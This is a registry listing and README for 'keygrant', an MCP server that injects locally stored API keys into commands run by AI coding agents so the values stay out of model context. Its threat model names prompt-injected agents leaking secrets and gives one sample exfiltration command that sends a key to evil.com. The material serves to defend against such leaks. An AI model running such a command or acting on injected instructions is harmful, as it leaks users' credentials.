keygrant

io.github.bazingaedwardv0.1.2更新于 Oct 8, 2026

Run commands with API keys injected per call — values never enter model context.

概览

AI 生成的概览

让 AI 编码代理在运行命令时注入已存储的 API 密钥,使密钥值不进入模型上下文。

功能
Keygrant 将密钥保存在本地加密保险库中,并暴露两个 MCP 工具:list_secrets 只返回名称、描述和使用元数据;exec_with_secrets 在服务端执行命令,把指定密钥注入子进程环境,并在返回前对全部输出做脱敏。它刻意不提供写入密钥值的工具,密钥只能通过命令行在带外写入。每次使用都需要用户通过原生对话框明确批准。
适用场景
当代理需要调用 API 或运行需要凭据的命令,而你希望这些值不出现在模型上下文、日志或生成的代码中时使用。适合单机上的本地编码代理工作流,且可以接受每次使用都需批准。
运行要求
以 Python 包形式通过 stdio 在本地运行(uvx 或 pip install keygrant),需要 Python 3.10 或更高版本。需要本地密钥存储:Windows 使用 DPAPI,macOS 使用登录钥匙串,Linux 使用通过 secret-tool 访问的 Secret Service 密钥环,批准对话框还需要 zenity。仅限桌面端;服务器本身未声明需要账号或 API 密钥。
安装前请注意
该服务器可以注入密钥执行命令,因此被攻陷的代理可能请求把密钥发送到远程主机的命令;批准对话框会显示完整命令,审查命令是主要控制手段。输出脱敏只是第二道防线,新型编码方式可能绕过。以同一操作系统用户身份运行的程序都能读取保险库,因此无法防御本地恶意软件。授权有效期为 15 分钟并绑定到会话。

安装

在 SourceWeft 中

  1. 打开 控制台中的 keygrant,将其添加到工作区。
  2. 为需要使用其工具的对话启用该服务。

Desktop only,通过 STDIO。 STDIO 服务会启动本地进程,因此需要 SourceWeft 桌面宿主。

其他 MCP 客户端

参照 仓库 中的启动说明。

README

keygrant

[demo: agent requests a secret, user approves via native dialog, output comes back redacted]

Per-command secret injection for AI coding agents. Secrets live in a local DPAPI-encrypted vault; the model's context only ever sees secret names — values are injected into the child process environment at exec time, and all output is redacted before it returns to the model.

Why: anything placed in an LLM's context can be exfiltrated (prompt injection, logs, generated code). The fix is architectural: keys never enter context, only the execution environment.

Components

  • keygrant.py — vault + CLI
    • keygrant set NAME [--desc TEXT] — store a secret (value via stdin, never argv)
    • keygrant list / rm NAME
    • keygrant exec [--redact] NAMES -- CMD — run CMD with secrets injected
    • keygrant revoke NAME|--all — revoke active approval grants
    • keygrant init — wire up a project (.mcp.json + CLAUDE.md guidance)
  • keygrant_mcp.py — MCP server (stdio JSON-RPC, zero deps)
    • list_secrets — names/descriptions/usage only, never values
    • exec_with_secrets — server-side exec with injection + forced output redaction
    • deliberately no set/store tool: writing a value through the model would put it in context; values enter out-of-band via the CLI only

Install

bash
uv tool install keygrant     # or: pipx install keygrant

Requires Python ≥ 3.10. macOS ships Python 3.9, so a bare pip install there fails; uv fetches a suitable Python automatically.

Then, in each project where agents should use secrets:

bash
keygrant init

init adds a keygrant entry to the project's .mcp.json (merging with any existing servers) and appends usage guidance for the model to CLAUDE.md, both idempotently. Restart Claude Code in that folder to load the server.

macOS

Values live in the login Keychain; approval is a native dialog.

[macOS: store a secret, approve via native dialog, value injected, output redacted]

Threat model

What this protects against:

  • Context exfiltration — a prompt-injected agent (or plain logging) leaking a secret that sits in model context. Values never enter context: the model only handles names; decryption and injection happen in the executing process.
  • Output leaks — an agent echoing a secret back. All output returned to the model is redacted, including base64, hex, and URL-encoded variants.
  • Grant riding — one agent session reusing an approval made in another. Grants are bound to the requesting session (MCP server id / CLI parent process) and expire after 15 minutes.
  • Silent use — every first use per session requires explicit user approval; timeout means deny.

What this does NOT protect against (known residual risks):

  • A compromised agent can request a command that exfiltrates the secret over the network (curl evil.com?k=%KEY%). The approval dialog shows the full command — reviewing it is the control. Per-secret egress allowlists (binding a key to permitted destination hosts) are on the roadmap.
  • Redaction is a second line of defense, not a guarantee: novel encodings can evade it. The primary guarantee remains "values never enter context".
  • Anything running as the same OS user can read the DPAPI vault. This tool scopes agent access to secrets; it is not a defense against local malware.

Approval

Every use of a secret — via the CLI or the MCP server — requires the user's approval through a native, topmost dialog (deny by default on a 60s timeout). Approving grants access to that secret for 15 minutes, bound to the requesting session (tracked in grants.json); keygrant revoke withdraws a grant early. Both channels go through the same gate, so an agent cannot bypass MCP approval by shelling out to the CLI — and a grant approved for one session cannot be reused by another. The dialog will be replaced by a resident tray app with toast notifications; the grant semantics stay the same.

Storage

  • Windows: values DPAPI-encrypted (per-user) inside %APPDATA%\keygrant\vault.json
  • macOS: values in the login Keychain (via the security CLI; the first read triggers the OS Keychain permission prompt — an extra OS-level gate); ~/.config/keygrant/vault.json holds metadata only
  • Linux: values in the Secret Service keyring via secret-tool (libsecret-tools + a running keyring daemon; approval dialogs need zenity); the vault file holds metadata only

The vault file also records usage metadata (use count, last used) as the seed of an audit trail.

Roadmap (prototype → product)

  1. Resident tray app (replaces the modal dialog; approval history, revoke UI)
  2. Per-secret egress allowlists (bind a key to permitted destination hosts)
  3. Optional cloud sync for teams (zero-knowledge: server stores ciphertext only)

来源:README.md,提交 65512d4

工具

0
工具元数据尚未被收录。

版本历史

1
  1. v0.1.2最新Oct 8, 2026